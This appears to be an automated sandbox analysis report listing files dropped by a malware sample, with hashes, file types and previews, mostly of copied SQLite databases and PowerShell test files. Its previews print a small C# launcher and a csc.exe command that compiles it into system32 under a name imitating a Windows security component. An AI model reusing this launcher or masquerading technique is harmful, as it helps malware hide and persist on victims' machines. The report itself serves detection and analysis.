                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                          Category:dropped
                                          Size (bytes):403
                                          Entropy (8bit):4.9812065051028425
                                          Encrypted:false
                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLcPWg5ZsaiFkD:JNVQIbSfhV7TiFkMSfhsWb7FkD
                                          MD5:CE4785EA0F632BFD616E7F4F06E23932
                                          SHA1:DC041377641B2382FFC870E16EECB2894B804705
                                          SHA-256:1F15C83F226E24FEB2C1C4BE52E5295BEB69A959F2C1EA9EC23A671B339D276E
                                          SHA-512:BAB0B58B3CEAECC911B01ABF70AC18F92044F727B242CBCB38BD3DAAB96F1A1B6D264750588BFFE6BB0DA7EF378D881F55D9D9346DA8A7A4814BA7F6D03CD6BD
                                          Malicious:false
                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe"); } catch { } }).Start();. }.}.
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                          Category:dropped
                                          Size (bytes):250
                                          Entropy (8bit):5.070344810085564
                                          Encrypted:false
                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fcbS9n:Hu7L//TRq79cQWfb9n
                                          MD5:4F06D69E79961CD436D561FDC4AEE20C
                                          SHA1:CC0C0DD8BCD1FDDA2D893F1997C6B4E137C4C095
                                          SHA-256:7267F5B640B4E2CCFED99D5AA7E3BFAECB359EBB4F5DC4C08E4CF504172FEE6D
                                          SHA-512:03A746F952A2C33A2C73354AE41F6BD16FA7CFA09D000314B71ED9C1D1DD9AA38BF3A814A722B49357B2E9ED10114F506B97610027BD67AA8F6264B9414EB122
                                          Malicious:true
                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.0.cs"
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                          Category:modified
                                          Size (bytes):750
                                          Entropy (8bit):5.250404550922122
                                          Encrypted:false
                                          SSDEEP:12:KJN/I/u7L//TRq79cQWfb9uKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfb9uKax5DqBVKVrdFf
                                          MD5:D4A180EE09A014D264C02BA935D4E98F
                                          SHA1:7DC9FA8584D4C4EC3D28645A2F1739A8DBA6DA16
                                          SHA-256:8822A075201F795AEDD98A9583A817BCF3C760CAF52B2844C2E531C254C1DBFB
                                          SHA-512:65FFB983E6079FB21B210D8BB52CD4B77F6D7C4010E17854C9A791BDCFC59B2E9C0D3993F3624FAA26B13684ACFCC0F1F10310C1305A5AC770F8BDB3823BF6DA
                                          Malicious:false
                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
